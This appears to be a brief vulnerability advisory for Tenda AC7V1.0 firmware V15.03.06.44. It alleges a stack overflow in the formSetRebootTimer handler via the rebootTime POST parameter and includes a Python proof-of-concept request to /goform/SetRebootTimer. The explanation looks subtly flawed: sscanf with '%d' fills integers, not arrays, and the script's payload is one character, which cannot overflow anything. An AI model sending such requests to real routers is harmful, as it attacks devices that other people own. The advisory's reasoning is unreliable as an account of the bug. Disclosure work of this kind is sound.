AC7V1.0 V15.03.06.44
In the Tenda AC7V1.0 V15.03.06.44 firmware has a stack overflow vulnerability in the formSetRebootTimer function. The reboot_time variable receives the rebootTime parameter from a POST request. However, since the user can control the input of rebootTime, the statement sscanf(reboot_time, "%d:%d", &end_hour, &end_min) can cause a buffer overflow. The user-provided rebootTime can exceed the capacity of the end_hour, end_min array, triggering this security vulnerability.
import requests
ip = "192.168.84.101"
url = "http://" + ip + "/goform/SetRebootTimer"
payload = "a"*1
data = {"rebootTime": payload}
response = requests.post(url, data=data)
print(response.text)
